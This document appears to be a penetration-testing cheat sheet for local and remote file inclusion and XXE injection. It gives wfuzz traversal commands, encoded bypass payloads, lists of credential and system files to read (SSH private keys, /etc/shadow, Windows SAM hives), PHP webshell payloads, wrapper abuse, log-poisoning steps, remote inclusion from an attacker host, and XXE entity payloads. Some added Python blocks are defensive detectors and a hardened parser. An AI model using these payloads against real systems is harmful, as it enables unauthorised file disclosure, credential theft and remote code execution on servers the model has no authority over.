# LFI / XXE

## 01. Local File Inclusion (LFI)

### 01.1 Linux

* Click [here](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_linux.txt) for the Linux wordlist

```bash
## ------------------| Linux
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367

wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367

## ------------------| Windows
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367
```

* Useful LFI files

```bash
../../../etc/passwd
../../../../../../../../../../../../etc/passwd

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/self/environ
/proc/self/cmdline
```

* [Bypass tricks](https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt)

```bash
../index.php
../../index.php
%2e%2e%2findex.php
%252e%252e%252findex.php
../../../../etc/passwd
/var/www/../../etc/passwd
../../../../../etc/passwd%00
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//....//etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
..///////..////..//////etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

* Configuration Files

```bash
## ------------------| Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log

## ------------------| nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
/etc/nginx/sites-available/default
/etc/nginx/nginx.conf
/etc/nginx/proxy_params

## ------------------| MySQL
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

## ------------------| Tomcat
/usr/share/tomcat9/bin/catalina.sh
/usr/share/tomcat9/etc/tomcat-users.xml
/var/lib/tomcat9/conf/tomcat-users.xml
/var/lib/tomcat9/conf/server.xml
/var/lib/tomcat9/conf/web.xml
/var/lib/tomcat9/conf/

## ------------------| Spring Boot
application.properties
application.yml
config/application.properties
config/application.yml

## ------------------| Webroot locations
/var/www/html/            # Apache
/usr/local/nginx/html/    # Nginx
c:\inetpub\wwwroot\       # IIS
C:\xampp\htdocs\          # XAMPP
C:\wamp\www\              # WAMP
```

* Log Files

```bash
## ------------------| Generic
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log

## ------------------| Red Hat/CentOS/Fedora Linux
/var/log/httpd/access_log

## ------------------| Debian/Ubuntu
/var/log/apache2/access.log

## ------------------| FreeBSD
/var/log/httpd-access.log

## ------------------| XAMPP
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
```

* Download the binary of a running process.

```bash
## ------------------| Identify runnable tasks and copy the PID
/proc/sched_debug

## ------------------| Get the executable path of that process and download the file
/proc/<PID>/cmdline

## ------------------| Get linked libs
/proc/<PID>/maps
```

### 01.2 Windows

* Click [here](https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/file_inclusion_windows.txt) for the Windows wordlist
* File Paths

```bash
/Windows/win.ini
/windows/system32/license.rtf
/Windows/debug/NetSetup.log
/Users/Administrator/NTUser.dat
/Documents and Settings/Administrator/NTUser.dat
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/boot.ini
/inetpub/wwwroot/global.asa
/MySQL/data/hostname.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/my.cnf
/MySQL/my.ini
/php4/php.ini
/php5/php.ini
/php/php.ini
/Program Files/Apache Group/Apache2/conf/httpd.conf
/Program Files/Apache Group/Apache/conf/httpd.conf
/Program Files/Apache Group/Apache/logs/access.log
/Program Files/Apache Group/Apache/logs/error.log
/Program Files/FileZilla Server/FileZilla Server.xml
/Program Files/MySQL/data/hostname.err
/Program Files/MySQL/data/mysql-bin.log
/Program Files/MySQL/data/mysql.err
/Program Files/MySQL/data/mysql.log
/Program Files/MySQL/my.ini
/Program Files/MySQL/my.cnf
/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
/Program Files/MySQL/MySQL Server 5.0/my.cnf
/Program Files/MySQL/MySQL Server 5.0/my.ini
/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/access.log
/Program Files (x86)/Apache Group/Apache/conf/error.log
/Program Files (x86)/FileZilla Server/FileZilla Server.xml
/Program Files (x86)/xampp/apache/conf/httpd.conf
/WINDOWS/php.ini
/WINDOWS/Repair/SAM
/Windows/repair/system
/Windows/repair/software
/Windows/repair/security
/WINDOWS/System32/drivers/etc/hosts
/WINNT/php.ini
/WINNT/win.ini
/xampp/password
/xampp/tomcat/conf/tomcat-users.xml
/xampp/htdocs/index.php
/xampp/apache/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/Windows/Panther/Unattend/Unattended.xml
/Windows/Panther/Unattended.xml
/Windows/system32/config/AppEvent.Evt
/Windows/system32/config/SecEvent.Evt
/Windows/system32/config/default.sav
/Windows/system32/config/security.sav
/Windows/system32/config/software.sav
/Windows/system32/config/system.sav
/Windows/system32/config/regback/default
/Windows/system32/config/regback/sam
/Windows/system32/config/regback/security
/Windows/system32/config/regback/system
/Windows/system32/config/regback/software
/Program Files/MySQL/MySQL Server 5.1/my.ini
/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
/Windows/System32/inetsrv/config/applicationHost.config
/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
```

### 01.3 Wrappers & Filters

```bash
## ------------------| Basic
?page=data:text/plain,h4rithd
?page=data:text/plain,<?php system($_GET['cmd']); ?>
?page=data:text/plain,<?php echo shell_exec("whoami"); ?>

## ------------------| Base64 and rot13
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php

## ------------------| zlib 
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
## To read 
# php -a #Starts a php console
# readfile('php://filter/zlib.inflate/resource=test.deflated');

## ------------------| zip://
# echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
# zip payload.zip payload.php;
# mv payload.zip shell.jpg;
# rm payload.php
?page=zip://shell.jpg%23payload.php

## ------------------| data://
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
?page=data://text/plain,<?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

## ------------------| expect://
?page=expect://id
?page=expect://ls

## ------------------| input://
?page=php://input
# POST DATA: <?php system('id'); ?>
```
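The bypass list in 01.1 and the wrapper list above are exactly what a defender's input check has to see through. As an added example (not from the page), this Python function canonicalises a `?page=` value the way PHP would effectively see it (overlong UTF-8 slash, repeated percent-decoding, backslashes, null truncation), reports every suspicious property, and checks whether the resolved path leaves an assumed webroot of `/var/www/html`; the wrappers beyond the page's own list (phar, glob, file, http, ftp) are real PHP wrappers added here.

```python
import posixpath
import re
from urllib.parse import unquote

# Stream wrappers from the wrappers/filters list on this page, plus other PHP wrappers
# (phar, glob, file, http, ftp) that an include() would also honour.
WRAPPERS = ("php://", "data:", "expect://", "zip://", "phar://", "glob://",
            "file://", "http://", "https://", "ftp://")

def canonicalize(value: str) -> tuple[str, list[str]]:
    """Undo the encoding tricks from the bypass list so one check sees the real path."""
    findings = []
    # %c0%af (overlong UTF-8 slash) is not valid UTF-8, so map it before percent-decoding.
    s = re.sub(r"%c0%af", "/", value, flags=re.IGNORECASE)
    rounds = 0
    while rounds < 3:                      # %252e -> %2e -> .  (double encoding)
        decoded = unquote(s)
        if decoded == s:
            break
        s, rounds = decoded, rounds + 1
    if rounds > 1:
        findings.append("double-encoding")
    s = s.replace("\\", "/")               # %5c tricks: treat backslash as a separator
    if "\x00" in s:                        # %00 truncation (old PHP versions)
        findings.append("null-byte")
        s = s.split("\x00", 1)[0]
    return s, findings

def inspect_include_param(value: str, webroot: str = "/var/www/html") -> list[str]:
    """Suspicious properties of a ?page= value; [] means a plain file relative to the webroot."""
    path, findings = canonicalize(value)
    low = path.lower()
    for w in WRAPPERS:
        if low.startswith(w):
            findings.append("wrapper:" + w)
            break
    if ".." in path:                       # covers ../, ....//, ..//// and friends
        findings.append("dot-dot")
    if path.startswith("/"):
        findings.append("absolute-path")
    # Resolve as PHP would: an absolute path ignores the webroot, a relative one joins it.
    resolved = posixpath.normpath(posixpath.join(webroot, path))
    if resolved != webroot and not resolved.startswith(webroot + "/"):
        findings.append("escapes-webroot")
    return findings

if __name__ == "__main__":
    for p in ["about.php", "%252e%252e%252fetc%252fpasswd", "....//....//....//etc/passwd",
              "pHp://FilTer/convert.base64-encode/resource=index.php"]:
        print(f"{p!r:58} -> {inspect_include_param(p)}")
```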

### 01.4 LFI to RCEs

Vulnerable pattern: `include($file);` where `$file` comes straight from the request.

* Log Poisoning

```bash
## ------------------| Basic Payload
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Send for apache
nc <IP> 80
...enter..payload..here!...

## Where session data (session/auth cookies and any other session information) and poisonable logs are stored
## ------------------| Linux
/tmp/sess_
/var/tmp/sess_
/var/lib/php/sessions/sess_
/proc/self/environ ## <-- use for User-Agent: <?=phpinfo(); ?>
/var/log/auth.log ## <-- use ssh '<?php system($_REQUEST['cmd']); ?>'@IP
/var/log/vsftpd.log ## <-- use the above payload as the username with ftp
/var/log/apache2/access.log ## <-- send it from nc (BEST WAY!!) or request http://IP/<?php phpinfo(); ?>

## ------------------| Windows
\Windows\TEMP\sess_<session_id>
c:\xampp\apache\logs\access.log&cmd=ipconfig
```
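From the detection side, log poisoning is two requests: one that plants a PHP tag in a file the server writes, then an include that reads that file back. This added example (not from the page) runs that check over a constructed Apache combined-log sample; the IPs, timestamps and sizes are made up, and the file patterns are the ones listed above.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log sample (not a real capture): a benign request, a raw request
# planting a PHP tag in the request line, the include that reads the log back, a scanner that
# only sends a tag in its User-Agent, then a tag aimed at /proc/self/environ and its read-back.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /<?php system($_REQUEST['cmd']); ?> HTTP/1.1" 404 210 "-" "-"
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9331 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:15 +0000] "GET /robots.txt HTTP/1.1" 200 44 "-" "<?php phpinfo(); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 640 "-" "<?=phpinfo(); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:25 +0000] "GET /index.php?page=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2101 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d{3} \S+ "[^"]*" "([^"]*)"$')
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Files the cheat sheet lists as include targets once a PHP tag has landed in them.
LOG_OR_SESSION = re.compile(r"/var/log/|/proc/self/environ|/sess_|apache/logs/", re.IGNORECASE)

def analyse_access_log(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, client_ip, alert) for each poisoning write or log/session read-back."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                       # not combined format; a real pipeline would flag this
        ip, request, ua = m.groups()
        if PHP_TAG.search(unquote(request)) or PHP_TAG.search(unquote(ua)):
            alerts.append((n, ip, "php-tag-in-request"))
        query = unquote(request.partition("?")[2]).replace("\\", "/")   # %2F and Windows paths
        if LOG_OR_SESSION.search(query):
            alerts.append((n, ip, "include-of-log-or-session-file"))
    return alerts

def poisoning_sources(alerts: list[tuple[int, str, str]]) -> set[str]:
    """Clients that both planted a tag and included a log/session file: the complete chain."""
    wrote = {ip for _, ip, a in alerts if a == "php-tag-in-request"}
    read = {ip for _, ip, a in alerts if a == "include-of-log-or-session-file"}
    return wrote & read

if __name__ == "__main__":
    found = analyse_access_log(SAMPLE_LOG)
    for a in found:
        print(a)
    print("log poisoning chain from:", poisoning_sources(found))
```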

### 01.5 Tricks

* phpinfo() (`file_uploads = on`)

```bash
# Download this script
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py
```

{% embed url="https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s" %}

### 01.6 LFI with python

* Click [`here`](https://docs.h4rithd.com/languages/python#02.-lfi-with-python)!

## 02. Remote File Inclusion

Requires `allow_url_include = On` in `php.ini` (it is `Off` by default).

```bash
nc -lvnp 80

## ------------------| Create payload file (php/txt)
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Execute
### move the file to /var/www/html and start the Apache server
### then include it remotely
?page=http://<IP>/file.txt
```

## 03. XML external entity (XXE) injection

* Common payloads

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>
        &xxe;
    </productId>
</stockCheck>
```

* Filters

```xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/hosts.php"> ]>
```
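The defensive counterpart, added here and not part of the page: Python's stdlib `expat` parser never fetches external entities on its own, so one function can inventory every declared entity for logging, while the hardened parser refuses any DOCTYPE before the body is read. The `stockCheck` document is the page's own payload; the clean request and its `381` product id are constructed.

```python
import xml.parsers.expat as expat

class DoctypeRejected(ValueError):
    """Raised when a document carries a DOCTYPE, the only place XXE entities can be declared."""

def audit_entities(doc: str) -> list[tuple]:
    """Detection view: list (entity name, SYSTEM id) declarations without resolving any of them."""
    found = []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.ExternalEntityRefHandler = lambda *args: 1           # acknowledge the reference, fetch nothing
    def on_entity(name, is_pe, value, base, system_id, public_id, notation):
        found.append((name, system_id))
    p.EntityDeclHandler = on_entity
    p.Parse(doc.encode(), True)
    return found

def parse_stock_check(doc: str) -> dict:
    """Hardened parse: refuse any DOCTYPE before the body is read, then collect element text."""
    text, stack = {}, []
    p = expat.ParserCreate()
    def reject(*_):
        raise DoctypeRejected("DOCTYPE / ENTITY declarations are not accepted")
    p.StartDoctypeDeclHandler = reject
    p.StartElementHandler = lambda name, attrs: stack.append(name)
    p.EndElementHandler = lambda name: stack.pop()
    p.CharacterDataHandler = lambda data: text.__setitem__(stack[-1], text.get(stack[-1], "") + data)
    p.Parse(doc.encode(), True)
    return {k: v.strip() for k, v in text.items() if v.strip()}

# The first document is the page's payload; the second is a constructed clean request.
XXE_DOC = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""
CLEAN_DOC = '<?xml version="1.0"?><stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>'

if __name__ == "__main__":
    print("declared entities:", audit_entities(XXE_DOC))
    print("clean request:", parse_stock_check(CLEAN_DOC))
    try:
        parse_stock_check(XXE_DOC)
    except DoctypeRejected as e:
        print("rejected:", e)
```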


